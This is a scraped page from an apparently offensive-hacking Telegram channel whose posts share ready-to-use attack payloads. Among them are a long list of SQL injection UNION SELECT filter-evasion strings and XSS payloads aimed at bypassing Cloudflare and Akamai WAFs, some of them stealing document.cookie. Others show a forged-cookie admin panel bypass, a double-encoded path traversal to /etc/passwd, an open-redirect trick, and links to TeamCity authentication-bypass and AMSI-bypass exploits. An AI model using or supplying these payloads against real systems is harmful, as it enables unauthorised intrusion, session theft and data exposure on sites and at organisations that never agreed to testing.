0Day.Today | Learn Exploit | Zero World | Dark web |
@LearnExploit
14.2K subscribers
1.11K photos
76 videos
462 files
1.09K links
☝️Iп Tнε Nαмε Oғ GOD☝️

Web Exploiting
& Server Hacking
Shell & Admin panel Access

priv8 Google hacking Dorks
new vul & bugs discovering & Tut


❗️0 day is today❗️

تبلیغات : @LearnExploitAds

IR0Day.Today
Download Telegram
About
Blog
Apps
Platform
Join
0Day.Today | Learn Exploit | Zero World | Dark web |
14.2K subscribers
0Day.Today | Learn Exploit | Zero World | Dark web |
Bypass open redirection whitelisted using chinese dots:

%E3%80%82

Tip: Keep eyes on SSO redirects

#Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
3.0K views
0Day.Today | Learn Exploit | Zero World | Dark web |
Akamai WAF bypass XSS
 
<input id=b value=javascrip>
<input id=c value=t:aler>
<input id=d value=t(1)>
<lol 
          contenteditable
          onbeforeinput='location=b.value+c.value+d.value'>
click and write here!


#WAF #Bypass
——————‌
0Day.Today
@LearnExploit
@Tech_Army
3.0K viewsedited  
0Day.Today | Learn Exploit | Zero World | Dark web |
Bypass SQL union select

/*!50000%55nIoN*/ /*!50000%53eLeCt*/
%55nion(%53elect 1,2,3)-- -
+union+distinct+select+
+union+distinctROW+select+
/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/
/**/UNION/**//*!50000SELECT*//**/
/*!50000UniON SeLeCt*/
union /*!50000%53elect*/
+#uNiOn+#sEleCt
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/*!%55NiOn*/ /*!%53eLEct*/
/*!u%6eion*/ /*!se%6cect*/
+un/**/ion+se/**/lect
uni%0bon+se%0blect
%2f**%2funion%2f**%2fselect
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
REVERSE(noinu)+REVERSE(tceles)
/*--*/union/*--*/select/*--*/
union (/*!/**/ SeleCT */ 1,2,3)
/*!union*/+/*!select*/
union+/*!select*/
/**/union/**/select/**/
/**/uNIon/**/sEleCt/**/
+%2F**/+Union/*!select*/
/**//*!union*//**//*!select*//**/
/*!uNIOn*/ /*!SelECt*/
+union+distinct+select+
+union+distinctROW+select+
uNiOn aLl sElEcT
UNIunionON+SELselectECT
/**/union/*!50000select*//**/
0%a0union%a0select%09
%0Aunion%0Aselect%0A
%55nion/**/%53elect
uni<on all="" sel="">/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
%0A%09UNION%0CSELECT%10NULL%
/*!union*//*--*//*!all*//*--*//*!select*/
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
+UnIoN/*&a=*/SeLeCT/*&a=*/
union+sel%0bect
+uni*on+sel*ect+
+#1q%0Aunion all#qa%0A#%0Aselect
union(select (1),(2),(3),(4),(5))
UNION(SELECT(column)FROM(table))
%23xyz%0AUnIOn%23xyz%0ASeLecT+
%23xyz%0A%55nIOn%23xyz%0A%53eLecT+
union(select(1),2,3)
union (select 1111,2222,3333)
uNioN (/*!/**/ SeleCT */ 11)
union (select 1111,2222,3333)
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/
%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/
+%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
/*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/
+%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+
/*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/
/union\sselect/g
/union\s+select/i
/*!UnIoN*/SeLeCT
+UnIoN/*&a=*/SeLeCT/*&a=*/
+uni>on+sel>ect+
+(UnIoN)+(SelECT)+
+(UnI)(oN)+(SeL)(EcT)
+’UnI”On’+'SeL”ECT’
+uni on+sel ect+
+/*!UnIoN*/+/*!SeLeCt*/+
/*!u%6eion*/ /*!se%6cect*/
uni%20union%20/*!select*/%20
union%23aa%0Aselect
/**/union/*!50000select*/
/^.*union.*$/ /^.*select.*$/
/*union*/union/*select*/select+
/*uni X on*/union/*sel X ect*/
+un/**/ion+sel/**/ect+
+UnIOn%0d%0aSeleCt%0d%0a
UNION/*&test=1*/SELECT/*&pwn=2*/
un?<ion sel="">+un/**/ion+se/**/lect+
+UNunionION+SEselectLECT+
+uni%0bon+se%0blect+
%252f%252a*/union%252f%252a /select%252f%252a*/
/%2A%2A/union/%2A%2A/select/%2A%2A/
%2f**%2funion%2f**%2fselect%2f**%2f
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
/*!UnIoN*/SeLecT+


#Bypass #SQL

📣 T.me/BugCod3
📣 T.me/LearnExploit
2.9K views
0Day.Today | Learn Exploit | Zero World | Dark web |
bypass XSS Cloudflare WAF

Encoded Payload:

&#34;&gt;&lt;track/onerror=&#x27;confirm\%601\%60&#x27;&gt;

Clean Payload:

"><track/onerror='confirm`1`'>

HTML entity & URL encoding:

" --> &#34;
> --> &gt;
< --> &lt;
' --> &#x27;
` --> \%60

#Bypass #XSS #WAF
——————‌
0Day.Today
@LearnExploit
@Tech_Army
2.8K viewsedited  
0Day.Today | Learn Exploit | Zero World | Dark web |
find an admin panel bypass using (admin=1).

/admin/tools/* --> 404 not found
but in the response there was a new cookie (with empty value)  -->  Set-Cookie:admin=;

Bypass request:

GET /admin HTTP/1.1
Cookie:admin=1;

#Trick #Bypass
——————‌
0Day.Today
@LearnExploit
@Tech_Army
2.8K views
0Day.Today | Learn Exploit | Zero World | Dark web |
CVE-2024-27198 & CVE-2024-27199 AUTHENTICATION BYPASS
Rce in jetbrains teamcity exploit

Github

Github

#exploit #Cve #Bypass
——————‌
0Day.Today
@LearnExploit
@Tech_Army
2.8K views
0Day.Today | Learn Exploit | Zero World | Dark web |
A cloudflare verification bypass script for webscraping

Github

#cloudflare #Bypass
——————‌
0Day.Today
@LearnExploit
@Tech_Army
2.7K viewsedited  
0Day.Today | Learn Exploit | Zero World | Dark web |
TeamCity
CVE-2024-27198 & CVE-2024-27199 TeamCity Authentication Bypass

LearnBox:
1_Exploits
2_Video

#CVE #Bug #Authentication #Bypass

📣 T.me/LearnExploit
📣 T.me/BugCod3
3.3K views
0Day.Today | Learn Exploit | Zero World | Dark web |
Nice collection of XSS filters bypasses 💎

Github

#Bypass #xss
——————‌
0Day.Today
@LearnExploit
@Tech_Army
2.7K views
0Day.Today | Learn Exploit | Zero World | Dark web |
Stored Xss payload 🔥

Payload for bypass waf:

<Img Src=OnXSS OnError=confirm("@Learnexploit")>

#xss #Bypass #WAF #Payload
——————‌
0Day.Today
@LearnExploit
@Tech_Army
3.3K views
0Day.Today | Learn Exploit | Zero World | Dark web |
Xss Payload

<A HRef=\" AutoFocus
OnFocus=top/**/?.['al'%2B'ert'](1)>

#xss #Bypass #WAF
——————‌
0Day.Today
@LearnExploit
@Tech_Army
3.2K views
0Day.Today | Learn Exploit | Zero World | Dark web |
Writeup: 23000$ for Authentication Bypass & File Upload & Arbitrary File Overwrite

Link

#Writeup #Bypass
——————‌
0Day.Today
@LearnExploit
@Tech_Army
2.9K views
0Day.Today | Learn Exploit | Zero World | Dark web |
CloudFlare XSS protection WAF Bypassed 💎

<Img Src=OnXSS OnError=confirm(document.cookie)>

#WAF #XSS #Bypass #CloudFlare
——————‌
0Day.Today
@LearnExploit
@Tech_Army
3.3K views
0Day.Today | Learn Exploit | Zero World | Dark web |
Bypassed strong Akamai WAF

payload: '"><A HRef=\" AutoFocus OnFocus=top/**/?.['ale'%2B'rt'](document%2Bcookie)>

#Waf #Bypass #Payload
——————‌
0Day.Today
@LearnExploit
@Tech_Army
3.0K views
0Day.Today | Learn Exploit | Zero World | Dark web |
"AMSI WRITE RAID" Vulnerability that leads to an effective AMSI BYPASS

Github

#Bypass
——————‌
0Day.Today
@LearnExploit
@Tech_Army
2.8K views
0Day.Today | Learn Exploit | Zero World | Dark web |
payload to bypass Akamai WAF

?foobar=<foo%20bar=%250a%20onclick=<your js code>

#WAF #Bypass #Payload
——————‌
0Day.Today
@LearnExploit
@Tech_Army
3.2K viewsedited  
0Day.Today | Learn Exploit | Zero World | Dark web |
Sql injection Manual Bypass WAF

Payload :

'AND+0+/*!50000UNION*/+/*!50000SELECT*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--+-

#sql_injection #Bypass #WAF
——————‌
0Day.Today
@LearnExploit
@Tech_Army
4.1K views
0Day.Today | Learn Exploit | Zero World | Dark web |
Forwarded from Root Exploit
Directory Traversal Bypass Payload ⚡️

/../../etc/passwd - 403 Forbidden 🚫

%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd - 200 OK

#Bypass #Payload
——————‌
@Learnexploit
@A3l3_KA4 💎
4.2K views
0Day.Today | Learn Exploit | Zero World | Dark web |
A Cloudflare WAF bypass combining simple (but efficient) tricks

<img%20hrEF="x"%20sRC="data:x,"%20oNLy=1%20oNErrOR=prompt`1>`

A payload with some obfuscation & filter evasion tricks

<img/src/onerror=setTimeout(atob(/YWxlcnQoMTMzNyk/.source))>

#CF #WAF #Bypass #Payload

📣 T.me/BugCod3
📣 T.me/LearnExploit
Please open Telegram to view this post
VIEW IN TELEGRAM
3.0K views